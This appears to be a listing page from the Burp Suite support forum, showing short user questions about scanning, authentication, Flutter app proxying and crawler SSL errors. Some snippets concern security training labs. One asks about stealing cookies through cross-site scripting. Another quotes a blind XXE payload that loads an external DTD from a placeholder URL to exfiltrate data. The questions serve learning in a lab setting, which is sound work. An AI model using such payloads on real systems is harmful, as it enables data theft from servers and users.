How Do I?

Make a new post

  • how burpsuit pro track this 'stranger' or assessment my PC to prove my PC have been hac...

    hi, i have PC for penetration test for internal application. but i suspect my PC has been hacked by other stranger. how burpsuit pro track this 'stranger' or assessment my PC to prove my PC have been hacked ?

    1 Agent Answer    0 Community Answer
    Nov 06, 2019 09:07AM UTC
  • Application Login Session

    During the manual audit/scan, why does the burp logsout the application under audit/scan? During the audit/scan, some of the requests are resulting in request timed out? Is it expected and what could be the reason? During the audit/scan, is it necessary to maintain an active session of the application under scan or Burp has the capability to handle this automatically?

    1 Agent Answer    0 Community Answer
    Nov 06, 2019 05:37AM UTC
  • lab question

    how am i supposed to steal cookies from this lab "Lab: Exploiting cross-site scripting to steal cookies" without having burp professional and without using Burp Collaborator client I've tried redirecting users to my site and making everyone that visits the blog post a comment but none of there two seems to work

    5 Agent Answers    5 Community Answers
    Nov 05, 2019 01:44PM UTC
  • How to use burp with flutter based Android applications

    Any tips while pen-testing Flutter based Android apps? Since it ignores system proxy and user/system CA certificates you cannot use burp suite easily. I found a couple of blogs but they suggest patching etc. Is there any easy way? Here is the relevant info I found online. https://hackmd.io/@runicpl/flutter-android https://blog.nviso.be/2019/08/13/intercepting-traffic-from-android-flutter...

    1 Agent Answer    0 Community Answer
    Nov 05, 2019 01:07PM UTC
  • Authenticated Scanning and Javascript crawling

    hi Portswigger, How can I create a new active scan that can either use a session handling rule or other means to run authenticated scan. My site doesn't use Basic Auth. It uses OAuth2.0 for Authentication. Also I want to enable Javascript crawling. I am using Burp Suite Professional 2.1.04. Thanks, --Jyothnsa

    1 Agent Answer    0 Community Answer
    Nov 05, 2019 12:44AM UTC
  • Burp Enterprise Support

    Hi Portswigger, For installing BurpSuite Enterprise for evaluation purpose, we are going with bare minimum requirements. The documentation shows this: Enterprise server machine Agent machine Base installation 10Gb of free disk space 16Gb of RAM 4 CPU cores 10Gb of fr...

    1 Agent Answer    0 Community Answer
    Nov 04, 2019 06:17PM UTC
  • Cross-site scripting (DOM-based)

    Burp has created 3 different DOM XSS issues with this description with High Severity and Firm Confidence The application may be vulnerable to DOM-based cross-site scripting. Data is read from window.location.hash and passed to the 'html()' function of JQuery. This is the static analysis : Data is read from window.location.hash and passed to the 'html()' function of JQ...

    1 Agent Answer    0 Community Answer
    Nov 02, 2019 06:26PM UTC
  • Lab: Exploiting blind XXE to exfiltrate data using a malicious external DTD

    Hi I'm having trouble with this lab I think I'm doing it right but not sure every time I try it nothing happens. So the challenge is I need to use burpcollaborator to get a dns and http response. I go to Go to exploit server and store my dtd file in the file. then I get my url and put it in this command <!DOCTYPE foo [<!ENTITY % xxe SYSTEM "YOUR-DTD-URL"> %xxe;]> %x...

    1 Agent Answer    0 Community Answer
    Nov 02, 2019 08:06AM UTC
  • burp setting

    I use burp professional version, I click new scan task, it asks me to define crawling and auditing parameter, I use default setting, i can't find xss and csrf, so any parameter need to be changed in audit setting so we can discover csrf and stored xss?

    2 Agent Answers    2 Community Answers
    Nov 02, 2019 04:10AM UTC
  • Encountering javax.net.ssl.SSLException: Unsupported or unrecognized ssl message when crawling

    I have recently upgraded to Burp Suite Pro 2.1.04. Previously I could spider my application but using the new crawler I immediately encounter the following exception and can't seem to get much further. javax.net.ssl.SSLException: Unsupported or unrecognized ssl message I am running Burp on Windows Server 2016. I have installed the Burp certificate in chrome and am proxying web traff...

    2 Agent Answers    1 Community Answer
    Nov 01, 2019 06:59PM UTC